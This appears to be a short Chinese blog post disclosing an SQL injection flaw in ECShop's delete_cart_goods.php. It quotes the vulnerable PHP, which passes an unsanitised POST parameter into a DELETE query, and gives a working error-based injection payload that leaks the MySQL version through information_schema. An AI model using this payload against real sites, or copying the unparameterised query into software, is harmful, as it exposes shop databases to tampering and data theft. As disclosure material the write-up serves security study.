ecshop 注入一枚

应该是古老的注入吧,新版的貌似都不存在有这个文件
文件
delete_cart_goods.php
源码
http://code.taobao.org/p/ecshop_modernshowmall/src/trunk/wwwroot/delete_cart_goods.php

if($_POST['id'])
{
$sql = 'DELETE FROM '.$GLOBALS['ecs']->table('cart')." WHERE rec_id=".$_POST['id'];
$GLOBALS['db']->query($sql);
}

问题还是一样的。这里的$_POST['id']直接带入了query($sql)
sql1

DELETE FROM `etshop`.`ecs_cart` WHERE rec_id=xxx
Unknown column 'xxx' in 'where clause'

提示找不到xxx这个字段。那我们随便写一个存在的不就好了~
首先来测试数字型的
ture
我们再测试下字符型的
false
随便赋予id值,都会带入sql语句
比如:

a and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)

完整的sql语句就变成了

DELETE FROM `etshop`.`ecs_cart` WHERE rec_id=a and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)

sql2

发表评论